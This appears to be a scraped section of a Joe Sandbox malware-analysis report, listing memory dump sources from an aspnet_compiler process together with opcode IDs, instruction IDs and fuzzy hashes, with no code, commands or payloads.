                                                                                                                                                          • Instruction Fuzzy Hash: 87112733740B11BFD72B5554AC01FAB7699AFD4B60F114028BB48CB1C0DBE1DC008795
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4b5ff005cd3a8b55fb18cd299e23f9644e9c83e34ea0c617de612d2f2b33f30d
                                                                                                                                                          • Instruction ID: 89687f6ee456d5f1dc54d84eb12627d01921014dd7321f06b45456b04caa0d63
                                                                                                                                                          • Opcode Fuzzy Hash: 4b5ff005cd3a8b55fb18cd299e23f9644e9c83e34ea0c617de612d2f2b33f30d
                                                                                                                                                          • Instruction Fuzzy Hash: 2621EBB1E00319ABCB54DFAAD9809AEFBF9FF98700F10416EE459E7244DB709941CB54
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                          • Instruction ID: 5020c7719ea7f4e64f3b32b3328ecd6c04dd9d9e4497eae4a2060f8f6cf73fc0
                                                                                                                                                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                          • Instruction Fuzzy Hash: B4218E72A00209EFDF129F99CC44BAEBBF9EF88310F204496F994A7251D734D950CB50
Memory Dump Source
• Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          • Instruction Fuzzy Hash: 3E11C272A00655ABDB21EF59C980B9EFBB9FF48755F510094EA85B7200D731AD118BA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3d1b89ea1165f267fcc7ebe85a837e4058f9c3a5a8f52049f73895205a667d3e
                                                                                                                                                          • Instruction ID: c6b7155fbb291ef201b370f591bca0773c2aab2b7fcc9bfbd4fdf506de49beab
                                                                                                                                                          • Opcode Fuzzy Hash: 3d1b89ea1165f267fcc7ebe85a837e4058f9c3a5a8f52049f73895205a667d3e
                                                                                                                                                          • Instruction Fuzzy Hash: 0101D675901106AFC359DF18D404F56BBFAEF91B18F2081B9E1458B261C770AC81CB94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                          • Instruction ID: 5d68ec0b3300c76c9ed7b6fda1382c48a9c3adb611d17817532e66a538d13bae
                                                                                                                                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                          • Instruction Fuzzy Hash: E011E5716026C79BE723A72CDD94BA93BD8EB01788F1900E0DEC18B642F728D942C254
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                          • Instruction ID: e602d3b0d63cb0ea2420e9c694e4a1e3fc86155475faf0b7c1e14ac36b83797e
                                                                                                                                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                          • Instruction Fuzzy Hash: 9C01D232600705EFE7A19F58CC00F9ABAE9FF84750F168065EA859F260E771DD40C790
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                          • Instruction ID: a17861a303c5c7e7859ba4e286f9cee7540286d31c4b7a852e2dc592334ae45e
                                                                                                                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                          • Instruction Fuzzy Hash: A30104B1644722EBCB618F1D9980A6A7BE8EB55770700857DF8D68B281C331D400EB60
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8b59b6dc55867ce6aa1baadcb9c5007a0bcf582beb16daca0bad27e96baf1029
                                                                                                                                                          • Instruction ID: df8fe0c743fc99622a2c15fd2fc6cdff594cbafbbedcfadb40353456c8230bcf
                                                                                                                                                          • Opcode Fuzzy Hash: 8b59b6dc55867ce6aa1baadcb9c5007a0bcf582beb16daca0bad27e96baf1029
                                                                                                                                                          • Instruction Fuzzy Hash: E811A131241241EFDB66EF19CD90F5ABBB9FF54B54F1000A9F9459B691C235ED01CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 97b6bcd1b5b58e84259d72c6de133459b985c5717a87ba6b5f1e487060b5b5cb
                                                                                                                                                          • Instruction ID: c043f84356931fef789e6e17080404c0a6fa700b0001fc71a58413e9ce531d9c
                                                                                                                                                          • Opcode Fuzzy Hash: 97b6bcd1b5b58e84259d72c6de133459b985c5717a87ba6b5f1e487060b5b5cb
                                                                                                                                                          • Instruction Fuzzy Hash: 69115A70542229ABEF65AB64CD52FE9B2B4AB04710F5041D4A798AA0E1DA709E81DF84
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5fcdb45a159d27bc10a8d28a4812100ce3c5cffdb21a649c34f532664e1690e7
                                                                                                                                                          • Instruction ID: bdc7abf7e2c604ea049c8a712044af5c3309e957d066052b38b1fa17949918af
                                                                                                                                                          • Opcode Fuzzy Hash: 5fcdb45a159d27bc10a8d28a4812100ce3c5cffdb21a649c34f532664e1690e7
                                                                                                                                                          • Instruction Fuzzy Hash: D911177290011DABCB15DB94CC80DEFBBBCEF48254F054166A946E7211EA35AA55CBA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                          • Instruction ID: fb01a35367130b4c819f4580ad999f0b39e11b90d81555c3eeb4a753c0204068
                                                                                                                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                          • Instruction Fuzzy Hash: 89014132201201CBEF919AADD880A9BB7AABFC4300F4551A9ED808F247DB71CC81C390
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b68db0da2acac35548f964e47dd4ee9cbd05a16bf33dcfdb90b43df0f2022896
                                                                                                                                                          • Instruction ID: e6c482ad8f4daf288d1820ad0b2664b612c9aff4b727523b60f505b5d35aaff7
                                                                                                                                                          • Opcode Fuzzy Hash: b68db0da2acac35548f964e47dd4ee9cbd05a16bf33dcfdb90b43df0f2022896
                                                                                                                                                          • Instruction Fuzzy Hash: 6711A5376441459FD715CF59D800BA5BBF9FB6A314F088199E8858B315D732EC81CBA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fd83fd570ecadec2c000e0627f4318833b3282bf35f425493d8104b841909630
                                                                                                                                                          • Instruction ID: 77dc2230232d4cc880a6ad03f0709496d5d874b89424aba2cf52898901e563c6
                                                                                                                                                          • Opcode Fuzzy Hash: fd83fd570ecadec2c000e0627f4318833b3282bf35f425493d8104b841909630
                                                                                                                                                          • Instruction Fuzzy Hash: A211E8B1A002499FCB04DFA9D551AAEBBF8FF58250F10806AB945E7351D674EE01CBA4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6b072746528d60d88262a2ddc8987c5bbd2b1a521353638604cd3d57c666d375
                                                                                                                                                          • Instruction ID: 1b8d0f23eb1c33a7dbd719f944d56050ab2d7077725239649ab2678104130a6d
                                                                                                                                                          • Opcode Fuzzy Hash: 6b072746528d60d88262a2ddc8987c5bbd2b1a521353638604cd3d57c666d375
                                                                                                                                                          • Instruction Fuzzy Hash: 1B0124310402119BC732AB29C501D7ABBF9FF52AA1B06847EE3D51BA21CB30EC41CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                          • Instruction ID: 21ebff95804049ce2a1fbcab00c5eb699d5e05b3cdc14f11c998ccd36297ce78
                                                                                                                                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                          • Instruction Fuzzy Hash: 72012832100705AFEB22E6B9C940EA777E9FFC5210F448469E6D68B940DE70E501CB50
Memory Dump Source
• Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                          • Instruction ID: ffbda84711303ee200ffea96ba67a31a78aa39f2c1f743acd615051607db7a40
                                                                                                                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                          • Instruction Fuzzy Hash: FA01F9312046859BE322A71DD905F9EFFECEF51B54F0880AAFAD48F691DA75C900C664
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3c45d60857e64688ff071abeb674ef1271078d53f17cb0d4165d29dd1b0905c3
                                                                                                                                                          • Instruction ID: e34f3404fb0a82ce6c7e42c446cf3c78954aa2741b1cc3a07179ec499e159c42
                                                                                                                                                          • Opcode Fuzzy Hash: 3c45d60857e64688ff071abeb674ef1271078d53f17cb0d4165d29dd1b0905c3
                                                                                                                                                          • Instruction Fuzzy Hash: E1018F71A002599FCF04DFA9D851AEEBBF8BF58310F14405AF901EB280D734EA11CB94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                          • Instruction ID: a662816308868ace3ffeede929fc5495e8ccfe278c7e9e1a0a69447c84dd958c
                                                                                                                                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                          • Instruction Fuzzy Hash: B1F01D7220011DBFEF019F94DD80DEF7B7EEB592A8B104125FA1196160D636DD21ABA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7cf346009260bba5d3d460d4ceda9ce6808853c283b89a611e6c97d9a2e1e9c1
                                                                                                                                                          • Instruction ID: e4687658ac35402d31bae403ea8d8f62efd83db1f0aef119133cb96951b692ae
                                                                                                                                                          • Opcode Fuzzy Hash: 7cf346009260bba5d3d460d4ceda9ce6808853c283b89a611e6c97d9a2e1e9c1
                                                                                                                                                          • Instruction Fuzzy Hash: BA018536200209EBCF129E84D840EDE3FA6FB4C664F068111FE2866224C736D9B0EB81
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 42c42e3a1fe64b3ba4469686ea4dd9f2ff9f03e51e55245e8a05f1a76c8e0f27
                                                                                                                                                          • Instruction ID: b96353815705f51a20249115f9c066b59c5fecdd32d4eefcf2a6df88f902668b
                                                                                                                                                          • Opcode Fuzzy Hash: 42c42e3a1fe64b3ba4469686ea4dd9f2ff9f03e51e55245e8a05f1a76c8e0f27
                                                                                                                                                          • Instruction Fuzzy Hash: B0F024B12052A19BF3909619DE81B6272D6EBD5750F2980BAEB858B2E1E9B1DC018394
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7ba36cf6ee71f98df585ea940c7502440bd6234d0f9adb704f5722c645ec4bf7
                                                                                                                                                          • Instruction ID: 975e4ae93e20a6ef7f4cdb00793f7d7e1cf61f27544b33e6a706112119b6f424
                                                                                                                                                          • Opcode Fuzzy Hash: 7ba36cf6ee71f98df585ea940c7502440bd6234d0f9adb704f5722c645ec4bf7
                                                                                                                                                          • Instruction Fuzzy Hash: FB01A4702046819BF363AB6CCD68F6E3BE8BB50F44F4941E4BAC1CB6E6D729D4418620
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                          • Instruction ID: 1caeb91c3cd64c8d8c6caf404038908f012744056385484dd470f9894d12697e
                                                                                                                                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                          • Instruction Fuzzy Hash: F9F0E935741D1347EBB6AA2D8851B2FB6D5DF90A40B05856C9FC1DBA80EF60D800C780
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                          • Instruction ID: afdb35512064736531c9beb3caf763a86519bb9eb6ff9aae8c821e7ae6257609
                                                                                                                                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                          • Instruction Fuzzy Hash: 44F05E327117529BE3219A4EDC81F16B7A8AFD5A60F6900B5A68C9F264C760EC0187E0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3c93c0b6e4e0f7d7431ae7500571283997f7a06909759053b65522265d4a8ca9
                                                                                                                                                          • Instruction ID: c8c61fe9cd0db0c9a2831cb443cef896df8ba97e188ff9757ae3f3e3633bfaaf
                                                                                                                                                          • Opcode Fuzzy Hash: 3c93c0b6e4e0f7d7431ae7500571283997f7a06909759053b65522265d4a8ca9
                                                                                                                                                          • Instruction Fuzzy Hash: 19F08C706093449FD714EF68C952A1AB7E8EF98610F40865AB8D8DB390E634EA01CB96
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                          • Instruction ID: 72b7e6f5551a24a190c1e86fbe87b83992f04714ccaf027548bfd0ff67246dd7
                                                                                                                                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                          • Instruction Fuzzy Hash: 3EF0B472614204EFE714EB25CC01F96B6E9EF9C340F148079A5C5D7174FAB1DD41C655
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 19d55c70d0685173a02cb9433ee2a896f314b54e8678fdeb941b673529eb8d61
                                                                                                                                                          • Instruction ID: 33c6d50604e55dd6de920911c905c6ca79d8acb15a2703353c48238b6cdf5d49
                                                                                                                                                          • Opcode Fuzzy Hash: 19d55c70d0685173a02cb9433ee2a896f314b54e8678fdeb941b673529eb8d61
                                                                                                                                                          • Instruction Fuzzy Hash: 78F06270A1124DDFDB04EFA9D625A9EB7F4FF58300F108069B995EB385DA34EA01CB94
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 179f579a759554fd05e9731f8a79dc347d41a51b35b04a7a85a7d63253818ca2
                                                                                                                                                          • Instruction ID: e34babd8b5eab16c3e84d41070b08e7a47510a26206a8b13def4c3d35657e89e
                                                                                                                                                          • Opcode Fuzzy Hash: 179f579a759554fd05e9731f8a79dc347d41a51b35b04a7a85a7d63253818ca2
                                                                                                                                                          • Instruction Fuzzy Hash: 7EF06D319166E59FE7E28A5CC844BFBBBD49B00A24F084DAADDE9C7542E764D8C0C650
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                          • Instruction ID: 0481c6ccee09d8727dad2705338715de1b70a704e7aa4f17fa0e1aa72f730335
                                                                                                                                                          • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                          • Instruction Fuzzy Hash: 6ED05E36511A50AFC3329F5BEA00C53BBF9FBD4B20709066EA58583924C671A806CBA0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                          • Instruction ID: fe0bd35d657512f53f0245d65c666d182481ef67a6cfa4889483a38a5a0fcb68
                                                                                                                                                          • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                          • Instruction Fuzzy Hash: 6FD0A932204624ABD772AA1CFC00FC333E9BB88B20F060499B088CB050C360AC81CA84
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                          • Instruction ID: 6e4807a79f6f377251e2462b09c75cae2015ff1dccbb15a15610b4741a4a2600
                                                                                                                                                          • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                          • Instruction Fuzzy Hash: 93E01235950784AFDF52DF59C640F9EBBF9FB94B40F150058A5885F660C634ED00CB80
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                          • Instruction ID: 298e6a3440e84f3769bd5f724469c46bccfac7a429fb887a3df7715a7f9d9307
                                                                                                                                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                          • Instruction Fuzzy Hash: AED02232317030D7CB285A556840FA76909AB80BA0F0A007C740B93800C0048C82C2E0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
